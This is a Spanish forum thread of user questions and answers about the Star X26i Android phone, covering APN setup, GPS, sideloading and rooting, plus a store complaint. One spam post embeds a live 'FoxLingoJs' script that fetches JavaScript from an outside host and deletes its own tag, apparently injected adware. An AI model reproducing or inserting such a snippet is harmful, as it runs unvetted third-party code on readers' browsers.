REVIEW REVIEW DEFINITIVA DEL STAR X26i XPERIA S. MT6575; 1GHZ; 512 RAM; 4GB ROM

ya los encontre.. lo configuro y tampoco me va.. no se lo llevare alguna tienda que me expliquen.. muchas gracias por todo
 
NO COMPREIS EN IOSEN!! (TIENDA cHINA)

Compre hace 2 meses un telefono en IOSEN, vendedor chino, y al cabo de este tiempo se me ha estropeado. Les he reclamado la garantía y no me contestan. Les he escrito como 20 emails.
Por eso os aviso de que si comprais en IOSEN, despediros de la garantia que es como si no la tuviera.
pAGUE POR pAYPAL- Pensaba que era mas de confianza, pero me han dicho, que me entienda con el vendedor. Ellos se limitan a cobrar y pagar NADA MAS!

@GAYAFON, tema reportado, spam.

Ha abierto un hilo y ha copidado en otros dos de tu foro el mismo mensaje.


<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>
 
Última edición por un moderador:
Hola,

Vivo en Costa Rica y compré en linea un celular X26i dual. Es mi primera experiencia en celulares Android y debido a que creo que no voy a tener soporte tecnico en mi pais, no quiero hacer nada que le represente algun problema o que vaya a bloquear el telefono. Por el momento todo parece funcionar bien excepto la "Conexion de datos". Fui a las agencias telefonicas locales y no pudieron hacerla navegar. Vi en el review algo referente a la opcion llamada "fast dormancy", y se la desactivé, pero igual sigue sin navegar. Mi pregunta es si hay algun otro parametro que podría estar causando que no pueda activar la conexion a datos. Si alguno tiene una idea, pues se lo agradeceré. No he rooteado el telefono todavía, pues no estoy seguro del procedimiento y cuales son los beneficios que voy a tener al rootearlo.
 
tienes que configurar los apn de tu operador celular, busca por internet los datos apn para android correspondientes a tu operador celular; luego los pones en configuracion/inalambrico y redes/mas.../redes moviles/APN/"nombre de tu operador" y creas el apn llenando los datos y guardas.
tienes que tener en cuenta que la targeta sim para 3g va en la sim 1, y que puedes activar o desactivar la conexion de datos deslizando hacia abajo la barra superior de la pantalla.

lo de rootear el telefono no es necesario si no piensas hacerle grandes cambios al celular, pero si quieres quitarle aplicaciones que no necesitas o app chinas o actualizarlo o cambierle la rom SI tendras que ser root. es un exelente celular si le sabes sacar probecho.
 
hoal buen dia a todos sigo con el problema del gps, ya agrege el archivo gps.conf a sytem/etc con el gps status si me da la ubicacion y no tarda demasiado, mero el sigyc es el que no puedo hacer que me ubique pasan mas de 20 minutos y no pesca nada ya intente lo del item test pero tampoco nada no se que estoy haciendo mal, agradezco sus atenciones
 
Hola, exelente aporte, gracias.

Tengo una duda como configuro el internet, es decir:

Nombre:

Apn:

Proxy:

Puerto:

Nombre De Usuario:

Contraseña:

Servidor:

Mmsc:

Proxy Mms:

Puerto Mms:

Protocolo de autenticación:

MCC:

MNC:

Tipo De Apn:

Lo necesito para el internet gratis =D asi que como en configuracion no encuentro esas opciones no estoy seguro de que en modo ingeniero con el codigo * # * # 3646633 # * # * esto pueda modificarse.... espero me puedan ayudar saludos y Gracias de nuevo.
 
Hola de nuevo, otra pregunta como puedo poner .apk desde la compu... donde las dejo caer y como las instalo?? pregunto esto por la aplicaciones que se descargo desde link y no del market

Saludos
 
PD: Segun entiendo se debe de activar la opcion de origen desconosido dentro de las opciones de aplicaciones.... donde se hace ya que no encuentro la opcion... disculen al NOOB u.u

Gracias
 
PD: Segun entiendo se debe de activar la opcion de origen desconosido dentro de las opciones de aplicaciones.... donde se hace ya que no encuentro la opcion... disculen al NOOB u.u

Gracias

Hola, te contesto de memoria, si no recuerdo mal esta en: ajustes de sistema, seguridad, administracion de dispositivos, y activas fuenes desconocidas.
 
Hola, te contesto de memoria, si no recuerdo mal esta en: ajustes de sistema, seguridad, administracion de dispositivos, y activas fuenes desconocidas.

Gracias =D me volvia loco, por que lo buscaba en las opciones de aplicaciones :/

=D Gracias
 

Del blog

  • Revisión del router con VPN Slate AX GL-AXT1800 de GL-iNet
    Sat, 27 Apr 2024 13:49:32 CEST
    Un vistazo al GL-AXT1800 El GL-iNet Slate AX WiFi 6 es un router/bridge de doble banda lo suficientemente pequeño como para llevarlo contigo mientras viajas. Es el primero de la marca en incorporar el ...
  • Vodafone lidera quejas en España según la OCU
    Fri, 26 Apr 2024 18:43:26 CEST
    Análisis de las reclamaciones en el primer trimestre de 2024 Durante el primer trimestre de 2024, la plataforma Reclamar de OCU recibió más de 17.000 reclamaciones, lo que ha impulsado la actividad de ...
  • Blackview se prepara para presentar el BL9000 Pro con tecnología FLIR®
    Thu, 25 Apr 2024 18:37:25 CEST
    Blackview fortalece su asociación con FLIR® para el lanzamiento del BL9000 Pro La marca de móviles Blackview continúa buscando su lugar en el mercado al fortalecer su colaboración con el líder de la i ...
  • O TikTok se vende, o se prohibe – así es la nueva ley en EE.UU
    Thu, 25 Apr 2024 10:23:41 CEST
    Ultimatum a TikTok El presidente Biden ha promulgado una ley que impactará significativamente a la popular plataforma de redes sociales TikTok en los Estados Unidos. Esta acción legislativa busca forz ...
  • 150 millones de usuarios activos en Threads
    Thu, 25 Apr 2024 10:07:20 CEST
    Threads, la aplicación de mensajería de Instagram, ya supera los 150 millones de usuarios activos mensuales El CEO de Meta, Mark Zuckerberg, reveló recientemente que Threads, la aplicación de mensajer ...

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba